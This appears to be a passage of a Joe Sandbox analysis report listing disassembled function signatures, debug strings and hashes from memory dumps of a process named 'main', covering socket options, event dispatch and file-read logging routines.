                                                      • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                      • API String ID: 325303940-110789774
                                                      • Opcode ID: 3bac57ab07ab6fa09b49fa917161877b71d61bac53155766da67bea0fd302a75
                                                      • Instruction ID: c64bde14cc31b08e0690adbaa0598c23149b4236ecf33881caa42d3ff452b311
                                                      • Opcode Fuzzy Hash: 3bac57ab07ab6fa09b49fa917161877b71d61bac53155766da67bea0fd302a75
                                                      • Instruction Fuzzy Hash: A0F06861F0A54A47F7105B1DA8203B65160ABD5B96F118231FD1E43796DD7DD8468708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastfflushfwriteioctlsocket
                                                      • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                      • API String ID: 325303940-110789774
                                                      • Opcode ID: 6a165083d59680d293bd1d3c3314456fe647c5da576488af89c7f0863e1abcf1
                                                      • Instruction ID: 2f0f0d85704f77d8f965256142e91bc5d2d07c02fde0cb53ad6cabd5a325e760
                                                      • Opcode Fuzzy Hash: 6a165083d59680d293bd1d3c3314456fe647c5da576488af89c7f0863e1abcf1
                                                      • Instruction Fuzzy Hash: E4F0F6A7F0D54242F352976AB8202B61560AF947F4F604231EC1E83796EE3CED478709
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                      • API String ID: 1729277954-3534120083
                                                      • Opcode ID: 41e517d12728adeed715081d1714c0f6129ea13c495914380e507ba7e152d11b
                                                      • Instruction ID: 4bc7e783954bd7383f91a79794301f3c85fec5650a31ba004a4ff0dd15b701a8
                                                      • Opcode Fuzzy Hash: 41e517d12728adeed715081d1714c0f6129ea13c495914380e507ba7e152d11b
                                                      • Instruction Fuzzy Hash: 3EF02B75B0914A8AF3115F26F8143A62660BB85B60F008231EE5D83BD6DF7CD94ACB04
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                      • API String ID: 1729277954-3534120083
                                                      • Opcode ID: 6c3eab3f1bb56b1379cccb35bccdbd326483b553a18c474a00197300edf8b18a
                                                      • Instruction ID: b95cc8c36a4d00defe2f1a91820f6827185037fe56151c00685d1e31be376445
                                                      • Opcode Fuzzy Hash: 6c3eab3f1bb56b1379cccb35bccdbd326483b553a18c474a00197300edf8b18a
                                                      • Instruction Fuzzy Hash: 7BF0F6A7B0A1468AF311DF25F8107A56560EF89B54F044231EE5D83796EF3CD556CB04
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                      • API String ID: 1729277954-3534120083
                                                      • Opcode ID: 19e9ab1836074a3352b32a52632690611a7abb063b1ae5ff54d4238178453e0b
                                                      • Instruction ID: 6f89aba5a27ad86250d751fbb02c1bb104c3ca55f514219b9f43daa839da76ec
                                                      • Opcode Fuzzy Hash: 19e9ab1836074a3352b32a52632690611a7abb063b1ae5ff54d4238178453e0b
                                                      • Instruction Fuzzy Hash: EFF02B62B0A50286F3105F2AB8105A62560FF847F4F44C231ED6D837D6DF7CD69AD708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                      • API String ID: 1729277954-3534120083
                                                      • Opcode ID: 6a0c773874180e26880ab9408dde3e1e82a1a78c10ef0331ebf13dd642ca3944
                                                      • Instruction ID: de04a9a91763d3175e89fd488f34b9b4402ad6fc97869f506b36eac754de390d
                                                      • Opcode Fuzzy Hash: 6a0c773874180e26880ab9408dde3e1e82a1a78c10ef0331ebf13dd642ca3944
                                                      • Instruction Fuzzy Hash: DDF08B65B0D10B87F3115F26B8103B62660BB95B60F004235ED2C837A6CF3CD54ACB04
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                      • API String ID: 1729277954-3534120083
                                                      • Opcode ID: 702f1731c740baea6aa01d70a6d9364a69a7575be2623aa0b7b7a230db5d70ac
                                                      • Instruction ID: 01cd6f515cb9c6ad787fa572e3fe4df7f337751830db9074e83d6ea86c98be3e
                                                      • Opcode Fuzzy Hash: 702f1731c740baea6aa01d70a6d9364a69a7575be2623aa0b7b7a230db5d70ac
                                                      • Instruction Fuzzy Hash: 70F02B61F0910E8BF7105B26F8107B6A660FB85B91F408231FE6D83796DE7CD54ACB04
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                      • API String ID: 1729277954-3534120083
                                                      • Opcode ID: 63126c6e928a2edf30332fec70366c77f6c68d58c758049f5329ce28a99afd50
                                                      • Instruction ID: 594272345cdaaf591b4428b925bda64ff2b8239efd3604ab03efd12ce4a90584
                                                      • Opcode Fuzzy Hash: 63126c6e928a2edf30332fec70366c77f6c68d58c758049f5329ce28a99afd50
                                                      • Instruction Fuzzy Hash: C3F0F6A3B095028AF3119F16F8102A66660AB847F4F104231ED6D8379ADE3CD94ACB08
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                                                      • API String ID: 1729277954-536111009
                                                      • Opcode ID: 7e63a788dda2df7644049a30458bce2b8fead849c875d8bc733ebdb9195ad845
                                                      • Instruction ID: edc4245068883e546cd160a2e5e5ae67a206a7f519593778fe19067523084a47
                                                      • Opcode Fuzzy Hash: 7e63a788dda2df7644049a30458bce2b8fead849c875d8bc733ebdb9195ad845
                                                      • Instruction Fuzzy Hash: 5DF024B3B1954286F3619F17F8001666AA0BF887F4F108231ED6D837A5DE3CC80A8B08
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: memsetstrchr
                                                      • String ID: [D] (%s) -> %s$sam3_recv_rsp
                                                      • API String ID: 2564583029-4292814133
                                                      • Opcode ID: e1d76a2a5c28645df0434631951a6c217f5af291312e21c2b1f087e674da43f9
                                                      • Instruction ID: f423779af190e7f2cce369ec6624b0c3b4a45cfcb93e50db58edfe0f6e0951d1
                                                      • Opcode Fuzzy Hash: e1d76a2a5c28645df0434631951a6c217f5af291312e21c2b1f087e674da43f9
                                                      • Instruction Fuzzy Hash: 5F21A11BB0E68642FA27572A68B437915405F637F4E184331EE7E4B7C3DE1CE442930A
                                                      APIs
                                                      Strings
                                                      • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFDA55AA2F6
                                                      • ebus_dispatch, xrefs: 00007FFDA55AA2EF
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                      • API String ID: 3168844106-1717220914
                                                      • Opcode ID: a91faa0a071495fb7360876c82dafc1f145316e459933f77a033ed3725372526
                                                      • Instruction ID: d71e836a0e1b507b99465d689bef9bf714c314ddbe84356163369dd74be3822e
                                                      • Opcode Fuzzy Hash: a91faa0a071495fb7360876c82dafc1f145316e459933f77a033ed3725372526
                                                      • Instruction Fuzzy Hash: 4B21C03AB0AA4A81EB528F11F86423DB3A0FB46F84F044531DA8D47BA5DF3DE891C704
                                                      APIs
                                                      Strings
                                                      • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFDA55D1336
                                                      • ebus_dispatch, xrefs: 00007FFDA55D132F
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                      • API String ID: 3168844106-1717220914
                                                      • Opcode ID: 11c8241b0c8d74f4a82eeb66a551a34d5c2a6ab914922c978e5f08f141abf23c
                                                      • Instruction ID: fa61a3548de31cc8bf7b2814365631edbe2b2f1a39052e95a3c0d2dc1d03161b
                                                      • Opcode Fuzzy Hash: 11c8241b0c8d74f4a82eeb66a551a34d5c2a6ab914922c978e5f08f141abf23c
                                                      • Instruction Fuzzy Hash: 3D213A3BB0AB8AC5EB16CF52E86026C6360EB46F94B184131DE5D877A6DF3CE851C704
                                                      APIs
                                                      Strings
                                                      • ebus_dispatch, xrefs: 00007FFDA557132F
                                                      • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFDA5571336
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                      • API String ID: 3168844106-1717220914
                                                      • Opcode ID: bef6f1460e2736084dac7ed7a628b9831c3536a2aaf622b168460eda8f7bd86d
                                                      • Instruction ID: 4cbd1fa12089ad95ae824e9d8f8b68a4629011dd44300364f9e1d30a86704bfa
                                                      • Opcode Fuzzy Hash: bef6f1460e2736084dac7ed7a628b9831c3536a2aaf622b168460eda8f7bd86d
                                                      • Instruction Fuzzy Hash: 86215E3AB0AA4AC1E7128F22F86026963A0FB46F94B544531DA9D877A5EF3CE851C704
                                                      APIs
                                                      Strings
                                                      • ebus_dispatch, xrefs: 00007FFDAC12602F
                                                      • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFDAC126036
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                      • API String ID: 3168844106-1717220914
                                                      • Opcode ID: e83c6fc510466567d90aaf3624748fadef7ce5cae9081cabc3fdd3160a3970bd
                                                      • Instruction ID: 19eb6b671b5b58a694c0919d5079a58a543c120eca5d4c90ec6867227129533b
                                                      • Opcode Fuzzy Hash: e83c6fc510466567d90aaf3624748fadef7ce5cae9081cabc3fdd3160a3970bd
                                                      • Instruction Fuzzy Hash: 37216F37B1AA4281EB629F11F8A02297360FB94BE8F544131DA5D477A9DF3CD851C708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
                                                      • Instruction ID: fe1f65c14c238ad030f72f028383c6bfad048c5a9a49d45c8c03a9ab6b157174
                                                      • Opcode Fuzzy Hash: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
                                                      • Instruction Fuzzy Hash: D4F05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
                                                      • Instruction ID: edea892eed85c3aa73837bb9288ca25a90f550bf0ef495c73371c9603cfb2e4f
                                                      • Opcode Fuzzy Hash: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
                                                      • Instruction Fuzzy Hash: 31F05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
                                                      • Instruction ID: df86253267b4352bd481ded57288674701e48d15a90376b4d0ac9bce17ea870b
                                                      • Opcode Fuzzy Hash: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
                                                      • Instruction Fuzzy Hash: 8BF03AE3E1861241E953BA48B841BB996522F453A8E890531CD4A0A6D9AF3DA8868220
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
